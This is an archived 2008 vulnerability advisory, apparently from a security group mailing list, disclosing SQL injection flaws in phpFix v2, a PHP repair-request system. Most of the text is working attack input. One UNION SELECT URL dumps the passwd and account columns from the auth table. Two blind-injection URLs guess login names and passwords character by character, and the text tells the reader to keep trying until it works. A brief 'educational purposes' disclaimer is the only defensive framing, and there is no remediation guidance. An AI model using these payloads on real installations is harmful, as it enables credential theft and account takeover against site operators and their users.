<<< Date Index >>>     <<< Thread Index >>>

phpFix v2 Multiple SQL Injection Vulnerability



  _____ _   _ _____  _____ _____ _____  
 /  ___| |_| |  _  \|  _  |  _  |_   _| 
 | (___|  _  | [_)_/| (_) | (_) | | |   
 \_____|_| |_|_| |_||_____|_____| |_|   
        C. H. R. O. O. T.  SECURITY  GROUP
        - -- ----- --- -- -- ---- --- -- - 
                     http://www.chroot.org

                     _   _ _ _____ ____ ____ __  _ 
   Hacks In Taiwan  | |_| | |_   _|  __|    |  \| |
   Conference 2008  |  _  | | | | | (__| () |     |
                    |_| |_|_| |_| \____|____|_|\__|
                                 http://www.hitcon.org


Title :: phpFix v2 Multiple SQL Injection Vulnerability

Author :: unohope [at] chroot [dot] org

IRC :: irc.chroot.org #chroot

ScriptName :: php&#32218;&#19978;&#22577;&#20462;&#31995;&#32113; v2

Download :: 
http://netlab.kh.edu.tw/download/php&#22577;&#20462;&#31995;&#32113;2.zip

Mirror :: http://www.badongo.com/file/9541310

_______________
[SQL Injection]

magic_quotes_gpc = Off

safe_mode = Off

- {browse.php} -

http://localhost/phpfix/fix/browse.php?kind=-99+union+select+0,passwd,account,3,4,5,6,7,8,9,10,11+from+auth

_____________________
[Blind SQL Injection]

- {00_pass.php} -

http://localhost/phpfix/auth/00_pass.php?passwd=blah&account='+or+account+like+'blah%
 // for login account

http://localhost/phpfix/auth/00_pass.php?passwd=blah&account='+or+passwd+like+'blah%
 // for login password

if matched, then return 
"&#23494;&#30908;&#37679;&#35492;&#12289;&#35531;&#19981;&#35201;&#30663;&#39449;&#36942;&#38364;",
else return 
"&#24115;&#34399;&#37679;&#35492;&#12289;&#35531;&#19981;&#35201;&#30663;&#39449;&#36942;&#38364;",
try error till you got it!

______
[NOTE]

!! This is just for educational purposes, DO NOT use for illegal. !!


# 2008/5/24 - chrO.ot group #